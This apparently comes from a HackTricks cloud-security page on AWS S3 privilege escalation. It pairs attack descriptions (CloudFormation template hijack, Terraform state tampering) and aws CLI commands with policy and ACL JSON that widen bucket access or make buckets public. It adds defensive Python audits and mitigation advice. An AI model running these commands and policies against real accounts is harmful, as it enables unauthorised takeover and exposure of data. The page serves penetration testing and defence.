# AWS - S3 Privesc
{{#include ../../../banners/hacktricks-training.md}}
## S3

### s3:PutBucketNotification, s3:PutObject, s3:GetObject

An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.

For example, an attacker with those permissions over a cloudformation bucket called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:
```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "s3:PutBucketNotification",
                "s3:GetBucketNotification",
                "s3:PutObject",
                "s3:GetObject"
            ],
            "Resource": [
                "arn:aws:s3:::cf-templates-*/*",
                "arn:aws:s3:::cf-templates-*"
            ]
        },
        {
            "Effect": "Allow",
            "Action": "s3:ListAllMyBuckets",
            "Resource": "*"
        }
    ]
}
```
And the hijack is possible because there is a small time window from the moment the template is uploaded to the bucket to the moment the template is deployed. An attacker might just create a lambda function in his own account that is triggered when a bucket notification is sent, and hijacks the content of that bucket.

The Pacu module `cfn__resource_injection` can be used to automate this attack.

For more information check the original research: https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/
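Two checks a defender would run against the chain above, as an added example (not HackTricks or Rhino Security Labs code): does an IAM policy hand out the full `PutBucketNotification` + `PutObject` + `GetObject` combination on a `cf-templates-*` bucket, and does a bucket's notification configuration point at a destination in another account (the footprint the hijack leaves). It works offline on dicts shaped like IAM policy documents and like the boto3 `get_bucket_notification_configuration` response; the account ids and the notification configuration are constructed.

```python
"""Audit helpers for the CloudFormation template-hijack chain described above.

Added example (not HackTricks or Rhino Security Labs code). Runs offline on dicts
shaped like IAM policy documents and like the boto3 response of
get_bucket_notification_configuration. Account ids below are constructed.
"""
import fnmatch
import json

OWN_ACCOUNT = "111111111111"  # constructed: the account that owns the bucket

# boto3 NotificationConfiguration keys and the ARN field each destination carries
_DEST_KEYS = {
    "LambdaFunctionConfigurations": "LambdaFunctionArn",
    "QueueConfigurations": "QueueArn",
    "TopicConfigurations": "TopicArn",
}


def arn_account(arn: str) -> str:
    """Account id field of an ARN (arn:partition:service:region:account:resource), or ''."""
    parts = arn.split(":", 5)
    return parts[4] if len(parts) >= 6 else ""


def foreign_notification_targets(config: dict, own_account: str = OWN_ACCOUNT) -> list:
    """Notification destinations that live outside own_account."""
    findings = []
    for key, arn_field in _DEST_KEYS.items():
        for dest in config.get(key, []):
            arn = dest.get(arn_field, "")
            if arn_account(arn) != own_account:
                findings.append((key, arn))
    return findings


def _as_list(x):
    return x if isinstance(x, list) else [x]


def statement_grants(policy: dict, action: str, resource: str) -> bool:
    """True if some Allow statement matches action and resource (IAM-style wildcards).
    Deny statements and conditions are ignored: this is a hunting heuristic, not an
    authoritative evaluator (IAM Access Analyzer is the authoritative tool)."""
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        acts = [a.lower() for a in _as_list(st.get("Action", []))]  # actions match case-insensitively
        ress = _as_list(st.get("Resource", []))
        if any(fnmatch.fnmatchcase(action.lower(), a) for a in acts) and any(
            fnmatch.fnmatchcase(resource, r) for r in ress
        ):
            return True
    return False


def enables_template_hijack(policy: dict, bucket: str) -> bool:
    """Does the policy grant the full combination from the section above on `bucket`?"""
    bucket_arn = f"arn:aws:s3:::{bucket}"
    return (
        statement_grants(policy, "s3:PutBucketNotification", bucket_arn)
        and statement_grants(policy, "s3:PutObject", bucket_arn + "/*")
        and statement_grants(policy, "s3:GetObject", bucket_arn + "/*")
    )


# The page's policy, used here as sample input
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["s3:PutBucketNotification", "s3:GetBucketNotification",
                "s3:PutObject", "s3:GetObject"],
     "Resource": ["arn:aws:s3:::cf-templates-*/*", "arn:aws:s3:::cf-templates-*"]},
    {"Effect": "Allow", "Action": "s3:ListAllMyBuckets", "Resource": "*"}
  ]
}""")

# Constructed notification configuration: one in-account SNS topic, one Lambda in a foreign account
SAMPLE_NOTIFICATION = {
    "TopicConfigurations": [
        {"TopicArn": "arn:aws:sns:us-east-1:111111111111:deploy-alerts",
         "Events": ["s3:ObjectRemoved:*"]}
    ],
    "LambdaFunctionConfigurations": [
        {"Id": "hook",
         "LambdaFunctionArn": "arn:aws:lambda:us-east-1:222222222222:function:hook",
         "Events": ["s3:ObjectCreated:*"]}
    ],
}

if __name__ == "__main__":
    print(enables_template_hijack(SAMPLE_POLICY, "cf-templates-nohnwfax6a6i-us-east-1"))  # True
    print(foreign_notification_targets(SAMPLE_NOTIFICATION))
```

In practice you would feed `foreign_notification_targets` the output of `aws s3api get-bucket-notification-configuration` for every `cf-templates-*` bucket, and alert on CloudTrail `PutBucketNotification` events against those buckets, since legitimate deployments never need to change their notification configuration.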
### s3:PutObject, s3:GetObject

These are the permissions to get and upload objects to S3. Several services inside AWS (and outside of it) use S3 storage to store config files.

An attacker with read access to them might find sensitive information in them.

An attacker with write access could modify the data to abuse some service and try to escalate privileges.

These are some examples:

- If an EC2 instance is storing the user data in a S3 bucket, an attacker could modify it to execute arbitrary code inside the EC2 instance.
### s3:PutObject, s3:GetObject (optional) over the terraform state file

It is very common that terraform state files are stored in the cloud provider's blob storage, e.g. AWS S3. The file extension for the state file is .tfstate, and bucket names often also indicate that they contain terraform state files. Usually, every AWS account has one such bucket to store the state files that describe the state of the account.

Also commonly, in real-world accounts almost always all developers have s3:* and sometimes even business users have s3:Put*.

So, if you have the listed permissions over these files, there is an attack vector allowing you to get RCE in the pipeline with the privileges of terraform - most of the time AdministratorAccess, making you admin of the cloud account. Also, you could use that vector to perform a denial of service attack by making terraform delete legitimate resources.

Follow the details in the Abusing Terraform State Files section of the Terraform Security page for the exploitation code:

{{#ref}}
terraform-security.md#abusing-terraform-state-files
{{#endref}}
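The detection side of the state-file vector, as an added example (not HackTricks code and not from the Terraform Security page): a scan over S3 data-event CloudTrail records that flags writes to any `.tfstate` key by a principal other than the pipeline role. The CloudTrail records, the bucket name `acme-terraform-state` and the role name `terraform-ci` are all constructed.

```python
"""Flag Terraform state writes that did not come from the CI pipeline role.

Added example, not HackTricks code. Input is one CloudTrail S3 data-event record
per line (JSON). Bucket, role and user names are constructed.
"""
import json

# The only principal expected to write state (assumed role name). Matching on the
# sessionIssuer role ARN ignores the per-run session name.
ALLOWED_STATE_WRITERS = {"arn:aws:iam::111111111111:role/terraform-ci"}
STATE_SUFFIX = ".tfstate"
WRITE_EVENTS = {"PutObject", "DeleteObject", "DeleteObjects", "CopyObject"}


def principal_of(event: dict) -> str:
    """Role ARN for role sessions, otherwise the calling identity's own ARN."""
    ident = event.get("userIdentity", {})
    issuer = ident.get("sessionContext", {}).get("sessionIssuer", {})
    return issuer.get("arn") or ident.get("arn", "")


def suspicious_state_writes(lines) -> list:
    """Return (eventName, principal, bucket/key) for state-file writes by unexpected principals."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("eventName") not in WRITE_EVENTS:
            continue  # reads of state are a separate (disclosure) concern
        params = ev.get("requestParameters") or {}
        key = params.get("key", "")
        if not key.endswith(STATE_SUFFIX):
            continue
        who = principal_of(ev)
        if who not in ALLOWED_STATE_WRITERS:
            findings.append((ev["eventName"], who, f"{params.get('bucketName', '')}/{key}"))
    return findings


def _event(name: str, ident: dict, bucket: str, key: str) -> str:
    """Build a minimal constructed CloudTrail S3 data-event record."""
    return json.dumps({
        "eventSource": "s3.amazonaws.com",
        "eventName": name,
        "userIdentity": ident,
        "requestParameters": {"bucketName": bucket, "key": key},
    })


CI_ROLE = {  # constructed assumed-role identity
    "type": "AssumedRole",
    "arn": "arn:aws:sts::111111111111:assumed-role/terraform-ci/run-42",
    "sessionContext": {"sessionIssuer": {"arn": "arn:aws:iam::111111111111:role/terraform-ci"}},
}
DEV_USER = {"type": "IAMUser", "arn": "arn:aws:iam::111111111111:user/dev-alice"}  # constructed

SAMPLE_EVENTS = [
    _event("PutObject", CI_ROLE, "acme-terraform-state", "prod/terraform.tfstate"),   # expected
    _event("PutObject", DEV_USER, "acme-terraform-state", "prod/terraform.tfstate"),  # flagged
    _event("GetObject", DEV_USER, "acme-terraform-state", "prod/terraform.tfstate"),  # read, ignored
    _event("PutObject", DEV_USER, "acme-terraform-state", "config/app.json"),         # not state
]

if __name__ == "__main__":
    for finding in suspicious_state_writes(SAMPLE_EVENTS):
        print(*finding)
```

Object-level S3 events only appear in CloudTrail when data events are enabled for the state bucket, so the first step is confirming the trail actually logs them; the second is pairing this alert with S3 versioning on the bucket, which makes a tampered state file recoverable.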
### s3:PutBucketPolicy

An attacker, who needs to be from the same account (otherwise the error `The specified method is not allowed` will be triggered), with this permission will be able to grant himself more permissions over the bucket(s), allowing him to read, write, modify, delete and expose buckets.
```bash
# Update Bucket policy
aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>

## JSON giving permissions to a user and maintaining some previous root access
{
    "Id": "Policy1568185116930",
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123123123123:root"
            },
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::somebucketname"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123123123123:user/username"
            },
            "Action": "s3:*",
            "Resource": "arn:aws:s3:::somebucketname/*"
        }
    ]
}

## JSON Public policy example
### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
{
    "Id": "Policy1568185116930",
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Stmt1568184932403",
            "Action": [
                "s3:ListBucket"
            ],
            "Effect": "Allow",
            "Resource": "arn:aws:s3:::welcome",
            "Principal": "*"
        },
        {
            "Sid": "Stmt1568185007451",
            "Action": [
                "s3:GetObject"
            ],
            "Effect": "Allow",
            "Resource": "arn:aws:s3:::welcome/*",
            "Principal": "*"
        }
    ]
}
```
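A bucket-policy audit that catches what the two policies above do, as an added example (not HackTricks code): it flags unconditional `"Principal": "*"` statements, principals from other accounts, and wildcard actions handed to an individual IAM user. It runs offline on the JSON that `aws s3api get-bucket-policy` returns; the account id 123123123123 is the page's sample value and the third policy (a cross-account role) is constructed.

```python
"""Bucket-policy audit for the PutBucketPolicy abuse described above.

Added example, not HackTricks code. Inspects policy documents offline, e.g. the
`Policy` string returned by `aws s3api get-bucket-policy`.
"""
import json

OWN_ACCOUNT = "123123123123"  # the page's sample account id


def _as_list(x):
    return x if isinstance(x, list) else [x]


def _principal_arns(principal) -> list:
    """Normalise the Principal element to a list of strings ('*' means anonymous)."""
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):  # {"AWS": [...]} / {"Service": ...} forms
        out = []
        for v in principal.values():
            out.extend(_as_list(v))
        return out
    return _as_list(principal)


def _account_of(arn: str) -> str:
    parts = arn.split(":", 5)
    return parts[4] if len(parts) >= 6 else ""


def audit_bucket_policy(policy: dict, own_account: str = OWN_ACCOUNT) -> list:
    """Return (Sid or #index, reason) for Allow statements that widen access."""
    findings = []
    for i, st in enumerate(policy.get("Statement", [])):
        if st.get("Effect") != "Allow":
            continue
        sid = st.get("Sid", f"#{i}")
        actions = _as_list(st.get("Action", []))
        for p in _principal_arns(st.get("Principal", {})):
            if p == "*" and "Condition" not in st:
                findings.append((sid, "unconditional public principal"))
            elif p != "*" and _account_of(p) not in ("", own_account):
                findings.append((sid, f"cross-account principal {p}"))
            elif ":user/" in p and any(a == "*" or a.endswith("*") for a in actions):
                findings.append((sid, f"wildcard actions granted to IAM user {p}"))
    return findings


# The page's first policy: root keeps ListBucket, one IAM user gets s3:* on all objects
USER_GRANT_POLICY = json.loads("""{
  "Id": "Policy1568185116930", "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123123123123:root"},
     "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::somebucketname"},
    {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123123123123:user/username"},
     "Action": "s3:*", "Resource": "arn:aws:s3:::somebucketname/*"}
  ]
}""")

# The page's second policy: anonymous list + read
PUBLIC_POLICY = json.loads("""{
  "Id": "Policy1568185116930", "Version": "2012-10-17",
  "Statement": [
    {"Sid": "Stmt1568184932403", "Action": ["s3:ListBucket"], "Effect": "Allow",
     "Resource": "arn:aws:s3:::welcome", "Principal": "*"},
    {"Sid": "Stmt1568185007451", "Action": ["s3:GetObject"], "Effect": "Allow",
     "Resource": "arn:aws:s3:::welcome/*", "Principal": "*"}
  ]
}""")

# Constructed: a role in a foreign account is granted read access
CROSS_ACCOUNT_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Partner", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::999999999999:role/partner-reader"},
         "Action": "s3:GetObject", "Resource": "arn:aws:s3:::somebucketname/*"}
    ],
}

if __name__ == "__main__":
    for name, pol in [("user-grant", USER_GRANT_POLICY), ("public", PUBLIC_POLICY),
                      ("cross-account", CROSS_ACCOUNT_POLICY)]:
        print(name, audit_bucket_policy(pol))
```

The "Access Denied" the page mentions for the public policy comes from S3 Block Public Access: with `BlockPublicPolicy` enabled at the account or bucket level, `PutBucketPolicy` rejects any policy that grants public access regardless of the caller's IAM permissions, which is why keeping that setting on everywhere is the cheapest mitigation for this section.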
### s3:GetBucketAcl, s3:PutBucketAcl

An attacker could abuse these permissions to grant himself more access over specific buckets.

Note that the attacker doesn't need to be from the same account. Moreover, the write access
```bash
# Update bucket ACL
aws s3api get-bucket-acl --bucket <bucket-name>
aws s3api put-bucket-acl --bucket <bucket-name> --access-control-policy file://acl.json

## JSON ACL example
## Make sure to modify the Owner's displayName and ID according to the Object ACL you retrieved.
{
    "Owner": {
        "DisplayName": "<DisplayName>",
        "ID": "<ID>"
    },
    "Grants": [
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
```
### s3:GetObjectAcl, s3:PutObjectAcl

An attacker could abuse these permissions to grant himself more access over specific objects inside buckets.
```bash
# Update bucket object ACL
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-policy file://objacl.json

## JSON ACL example
## Make sure to modify the Owner's displayName and ID according to the Object ACL you retrieved.
{
    "Owner": {
        "DisplayName": "<DisplayName>",
        "ID": "<ID>"
    },
    "Grants": [
        {
            "Grantee": {
                "Type": "Group",
                "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
            },
            "Permission": "FULL_CONTROL"
        }
    ]
}
## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
```
### s3:GetObjectAcl, s3:PutObjectVersionAcl

An attacker with these privileges is expected to be able to put an ACL on a specific object version.
```bash
aws s3api get-object-acl --bucket <bucket-name> --key flag
aws s3api put-object-acl --bucket <bucket-name> --key flag --version-id <value> --access-control-policy file://objacl.json
```
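Bucket ACLs, object ACLs and object-version ACLs share one JSON shape, so a single audit serves the three ACL sections above. This is an added example, not HackTricks code: it flags grants to the public `AllUsers` / `AuthenticatedUsers` groups and dangerous grants to non-owner canonical users, and it diffs a before/after pair so a `PutBucketAcl` or `PutObjectAcl` alert can show exactly which grant was added. The owner id and the "before" ACL are constructed; the "after" ACL is the page's ACL applied on top of the owner grant.

```python
"""ACL audit for the bucket-ACL, object-ACL and object-version-ACL sections above.

Added example, not HackTricks code. Runs offline on the JSON returned by
`aws s3api get-bucket-acl` / `get-object-acl`. Owner id is constructed.
"""

PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers (anonymous)",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers (any AWS account)",
}
# Permissions that let a grantee change content or the ACL itself
DANGEROUS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}


def audit_acl(acl: dict) -> list:
    """Return (grantee label, permission) for public grants and dangerous non-owner grants."""
    owner_id = acl.get("Owner", {}).get("ID")
    findings = []
    for grant in acl.get("Grants", []):
        g = grant.get("Grantee", {})
        perm = grant.get("Permission", "")
        if g.get("Type") == "Group":
            label = PUBLIC_GROUPS.get(g.get("URI"))
            if label:  # any permission at all to a public group is a finding
                findings.append((label, perm))
        elif g.get("Type") == "CanonicalUser" and g.get("ID") != owner_id and perm in DANGEROUS:
            findings.append((f"CanonicalUser {g.get('ID')}", perm))
    return findings


def added_grants(before: dict, after: dict) -> list:
    """Grants present in `after` but not in `before`: what a Put*Acl call widened."""
    def key(grant):
        g = grant.get("Grantee", {})
        return (g.get("Type"), g.get("URI") or g.get("ID") or g.get("EmailAddress"),
                grant.get("Permission"))
    old = {key(g) for g in before.get("Grants", [])}
    return [g for g in after.get("Grants", []) if key(g) not in old]


OWNER = {"DisplayName": "acme-admin", "ID": "0" * 64}  # constructed canonical owner

# Constructed baseline: owner-only FULL_CONTROL, which is what a fresh bucket or object has
BEFORE_ACL = {
    "Owner": OWNER,
    "Grants": [{"Grantee": {"Type": "CanonicalUser", "ID": OWNER["ID"],
                            "DisplayName": OWNER["DisplayName"]},
                "Permission": "FULL_CONTROL"}],
}

# The page's ACL once applied: owner grant plus FULL_CONTROL for every authenticated AWS user
AFTER_ACL = {
    "Owner": OWNER,
    "Grants": BEFORE_ACL["Grants"] + [
        {"Grantee": {"Type": "Group",
                     "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
         "Permission": "FULL_CONTROL"}
    ],
}

if __name__ == "__main__":
    print(audit_acl(AFTER_ACL))
    print(added_grants(BEFORE_ACL, AFTER_ACL))
```

`AuthenticatedUsers` sounds restrictive but means any AWS account holder anywhere, so the page's ACL is effectively public. The structural fix is S3 Object Ownership set to `BucketOwnerEnforced`, which disables ACLs for the bucket entirely and turns every `PutBucketAcl`/`PutObjectAcl` path in these three sections into a no-op; where ACLs must stay on, alert on those CloudTrail events and diff the result with `added_grants`.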
{{#include ../../../banners/hacktricks-training.md}}